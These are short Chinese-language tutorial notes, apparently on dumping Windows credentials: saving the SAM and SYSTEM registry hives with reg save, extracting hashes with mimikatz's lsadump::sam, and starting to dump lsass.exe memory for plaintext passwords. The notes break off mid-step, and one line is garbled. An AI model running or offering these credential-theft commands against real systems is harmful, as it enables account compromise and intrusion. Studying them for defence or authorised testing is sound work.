1. 注册表导出
- reg save hklm\sam sam.hiv ———> SAM文件
- reg save hklm\system sys.hiv ———> SYS文件
- 注意事项:
1) 在Windows 2003版本包含2003以上都可以使用该命令
2) 在windows 2003中他会以ltml
3) 都是加密Hash - 演示:
1)下载mimikatz然后执行:
- lsadump::sam /sam:sam.hiv /system:sys.hiv
2. 获取系统文件
- 位置:
C:\Windows\System32\config
3. 获取明文密码
1. 任务管理器导出lsass.exe内存
1)任务管理器中找到 lsass.exe
2 )创建转储文件